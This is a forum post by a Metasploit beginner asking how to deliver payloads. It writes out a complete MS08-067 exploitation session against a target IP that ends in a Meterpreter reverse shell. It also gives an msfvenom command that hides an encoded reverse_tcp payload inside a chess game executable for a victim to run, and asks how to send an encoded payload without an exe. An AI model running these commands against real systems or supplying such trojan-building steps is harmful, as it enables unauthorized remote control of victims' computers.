I am newbie in Metasploit .still clearing my basics but i have a bit confusion if anyone answer me i am highly obliged .
1 ) –
Previously i learn how to simply exploit any O.S vulnerability using meterpreter .we can send exploit to target system and create a bind shell/reverse shell for control .ex –
Hack windows xp with MS08-067 exploit
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.4 (Target)
RHOST => 192.168.1.4
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > exploit
meterpreter > sysinfo
meterpreter > shell
Now by above commands we can use shell of target from attacker machine.there are no need to create any exe in order to connect target vulnerable system.meterpreter automatically inject on memory and we can get shell .
2 ) –
Now when i we use encoder then we have to create an exe and have to bind our payload inside exe .when victim run this exe we can get victim system shell .
msfvenom -p windows/meterpreter/reverse_tcp LHOST= “” LPORT= “”-x /usr/share/chess.exe -e x86/shikata_ga_nai -i 200 -f exe >chess.exe
In order to exploit victim system we have to transfer this exe to victim system .
I just want to know previously we do’t require any exe in order to exploit system but with use of encoder we need an exe to hide payload .
can we simply encode our meterpreter tcp_bind payload without exe and send this to victim system ?
Any help really appreciable .
Continue reading When to send exe file to target system in order to exploit via metasploit→